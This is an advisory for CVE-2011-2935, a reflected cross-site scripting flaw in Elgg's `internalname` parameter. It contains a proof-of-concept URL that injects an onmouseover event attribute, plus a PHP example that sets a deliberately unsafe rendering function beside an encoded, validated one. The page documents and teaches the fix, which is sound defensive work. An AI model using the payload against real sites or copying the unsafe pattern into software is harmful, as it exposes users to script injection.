CVE-2011-2935
MEDIUM 6.1 | EPSS 0.31% | Elgg Reflected XSS Vulnerability
Published: 2022/4/22 | Modified: 2024/1/12
Description
### VULNERABILITY DESCRIPTION

The `internalname` parameter is not properly sanitized, which allows an attacker to conduct a cross-site scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.

### PROOF-OF-CONCEPT/EXPLOIT

```http
http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22
```
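
The pattern behind this report, as an added PHP example (not Elgg's code and not the upstream patch): it assumes the `internalname` value is echoed into a double-quoted HTML attribute, as the shape of the PoC suggests. The `<input>` markup and all function names are hypothetical, and the attribute listing relies on PHP's DOM extension.

```php
<?php
// Added illustration; not Elgg source code. Markup and names are hypothetical.

// Vulnerable pattern: request value concatenated into a quoted attribute.
function render_field_unsafe(string $internalname): string {
    return '<input type="file" name="' . $internalname . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_field_safe(string $internalname): string {
    $encoded = htmlspecialchars($internalname, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="file" name="' . $encoded . '" />';
}

// Input-side check, assuming field names are plain identifiers (assumption).
function is_valid_internalname(string $internalname): bool {
    return preg_match('/\A[A-Za-z0-9_\-]{1,64}\z/', $internalname) === 1;
}

// List the attribute names a parser sees on the rendered <input> element.
function attribute_names(string $html): array {
    $previous = libxml_use_internal_errors(true); // tolerate sloppy markup
    $doc = new DOMDocument();
    $doc->loadHTML($html);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $names = [];
    $input = $doc->getElementsByTagName('input')->item(0);
    if ($input !== null) {
        foreach ($input->attributes as $attr) {
            $names[] = $attr->name;
        }
    }
    return $names;
}

// Query value from the PoC on this page, URL-decoded as PHP does for $_GET.
$value = urldecode('%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22');

// Unsafe: the first quote closes name="", so event-handler and style
// attributes are parsed as part of the element.
echo implode(', ', attribute_names(render_field_unsafe($value))), PHP_EOL;

// Safe: quotes are emitted as &quot;, so the whole value stays inside name="".
echo implode(', ', attribute_names(render_field_safe($value))), PHP_EOL;

var_dump(is_valid_internalname($value));
var_dump(is_valid_internalname('upload'));
```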
Affected packages (1)
- Packagist: elgg/elgg, from 0, < 1.7.11
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM 6.1 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
References (8)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2011-2935
- PATCH: https://github.com/Elgg/Elgg
- WEB: https://github.com/Elgg/Elgg/commit/2843b4f846874d434a2403ac1f27e41035b45e04
- WEB: https://github.com/Elgg/Elgg/issues/3544
- WEB: https://oss-security.openwall.narkive.com/1UH3NYx8/cve-request-elgg-1-7-10-multiple-vulnerabilities
- WEB: https://security-tracker.debian.org/tracker/CVE-2011-2935
- WEB: https://web.archive.org/web/20110907122607/http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released
- WEB: http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin